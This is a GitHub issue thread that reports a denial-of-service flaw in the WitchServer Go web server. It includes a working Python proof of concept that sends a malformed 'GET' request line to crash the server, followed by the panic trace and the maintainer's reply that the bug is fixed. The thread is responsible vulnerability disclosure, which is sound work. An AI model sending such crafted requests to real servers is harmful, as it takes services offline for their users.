### ISSUE TITLE
[Vulnerability][DOS] WitchServer panic with crafted packet

### ISSUE THREAD

**Issue by mauricelambert** [TboOffical/WitchServer#9]
**DOS attack with crafted packet**
You don't check the HTTP request validity that cause a Denial Of Service vulnerability with crafted packet. You should check the array length before using the second element.

**To Reproduce**
1. Use the following python code on your WitchServer

**Expected behavior**
The WitchServer will crash with a panic (runtime error).

Send crafted packet using python script:
```python
from urllib.request import urlopen
from socket import socket, setdefaulttimeout, AF_INET, SOCK_STREAM

response = urlopen("http://localhost:8000/", timeout=2) # check server is up
response.status                                         # 200
print(response.read().decode())                         # <title>Witch -> Cant Find file</title><center><img style='border-top: groove;' src='https://i.imgur.com/GJIUMVC.png' </center>

setdefaulttimeout(2)
address = ("localhost", 8000)

sock = socket(AF_INET, SOCK_STREAM)
sock.connect(address)

sock.send(b"GET\r\n")
response = sock.recv(1024)
response                                                # b''

sock.close()

response = urlopen("http://localhost:8000/", timeout=2) # check server is down
```

Output:
```text
# Traceback (most recent call last):
#     ...
# ConnectionRefusedError: [Errno 111] Connection refused
# Traceback (most recent call last):
#     ...
# urllib.error.URLError: <urlopen error [Errno 111] Connection refused>
```

WitchServer output:
```
# ~# docker run --rm -it -p 8000:8000 mauricelambert/witch:latest bash
#  _       ____________________  __
# | |     / /  _/_  __/ ____/ / / /
# | | /| / // /  / / / /   / /_/ / 
# | |/ |/ // /  / / / /___/ __  /  
# |__/|__/___/ /_/  /____/_/ /_/   

# Witch Started
# Now Listening For new Connections On Port 8000
# Acccess The Server by navigateing to http://localhost:8000 In Your Web Browser
# No certificate was loaded
# ----------------------------------------------------------------------------
# A Web Web Browser has connected -> 172.17.0.1:36596
# No Index.html File Found
# A Web Web Browser has connected -> 172.17.0.1:36598
# No Index.html File Found
# A Web Web Browser has connected -> 172.17.0.1:36600
# No Index.html File Found
# A Web Web Browser has connected -> 172.17.0.1:36602
# No Index.html File Found
# A Web Web Browser has connected -> 172.17.0.1:36604
# panic: runtime error: index out of range [1] with length 1

# goroutine 10 [running]:
# main.handleConnection({0x6a1188?, 0xc0000100b8})
#         /go/WitchServer/listener.go:46 +0xa07
# created by main.main
#         /go/WitchServer/witch.go:147 +0x8c7
```

**Comment by TboOffical** [comment]
This is a important issue. I going to start work on it now

**Comment by TboOffical** [comment]
Fixed
